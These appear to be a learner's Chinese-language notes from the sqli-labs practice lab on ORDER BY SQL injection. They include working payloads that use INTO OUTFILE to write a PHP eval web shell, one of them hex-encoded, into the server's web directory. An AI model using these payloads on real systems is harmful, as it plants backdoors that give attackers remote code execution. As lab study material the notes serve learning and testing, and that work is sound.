一、对order by sort进行注入:
(1)order by sort后面不能用 union select ,否则会出现报错:
Incorrect usage of UNION and ORDER BY
(2)没有引号包裹的时候若输入:?sort=111 会报错,但是我尝试了一下,此时输入?sort=111111111111111111111 反而返回正常了,很奇怪,记录一下;
(3)若 sort 被引号包裹,无论引号内是什么都可以查询出结果;
补充:
(1)left(string, num) 截取出 string 字符从左往右数前num个字符;
(2)right(string, num) 截取出 string 字符从右往左数前num个字符;
(3)lines teminated by 0x16string 通过 string 把每一行查询结果用string结尾;0x16string可以换做一句话木马;
http://127.0.0.1/Less-46/
?sort=1 into outfile "D:\\sqli-labs\\sqli-labs-master\\Less-46\\1.php"
lines terminated by
0x3c3f70687020406576616c28245f504f53545b227777225d293b203f3e--+
补充一句话木马的写入方式:
(1)
http://127.0.0.1/Less-1/?id=1' into outfile "D:\\sqli-labs\\sqli-labs-master\\Less-1\\ydyy1.php" lines terminated by '<?php @eval($_POST["ww"]); ?>'--+
(2)
http://127.0.0.1/Less-1/?id=1' and (select '<?php @eval($_POST["ww"]); ?>') into outfile "D:\\sqli-labs\\sqli-labs-master\\Less-1\\ydyy1.php"--+(4)sql语句中,asc是按列升序排序,desc是按列降序排序;
select * from users order by id desc; 降序排序
select * from users order by id asc; 升序排序(5)order by :
select * from users order by 1; 按第一列排序
select * from users order by 2; 按第二列排序
1166
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
